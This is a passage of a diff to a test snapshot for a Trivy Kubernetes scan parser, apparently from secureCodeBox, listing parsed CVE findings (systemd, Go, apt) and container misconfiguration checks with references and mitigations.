(go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://www.debian.org/security/2021/dsa-4942", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Dockerfile' / Class: 'config' / Type: 'dockerfile'", - "id": "DS005", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://docs.docker.com/engine/reference/builder/#add", - "https://avd.aquasec.com/misconfig/ds005", - ], - }, - "category": "Misconfiguration", - "description": "You should use COPY instead of ADD unless you want to extract a tar file. Note that an ADD command will extract a tar file, which adds the risk of Zip-based vulnerabilities. Accordingly, it is advised to use a COPY command, which does not extract tar files.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Use COPY instead of ADD", - "name": "ADD instead of COPY(Consider using 'COPY . /' command instead of 'ADD . /')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ds005", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://docs.docker.com/engine/reference/builder/#add", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Dockerfile' / Class: 'config' / Type: 'dockerfile'", - "id": "DS026", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://blog.aquasec.com/docker-security-best-practices", - "https://avd.aquasec.com/misconfig/ds026", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, - "category": "Misconfiguration", - "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Add HEALTHCHECK instruction in Dockerfile", - "name": "No HEALTHCHECK defined(Add HEALTHCHECK instruction in your Dockerfile)", + "category": "Vulnerability", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ds026", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2149063", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://blog.aquasec.com/docker-security-best-practices", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", @@ -113256,57 +112748,82 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": 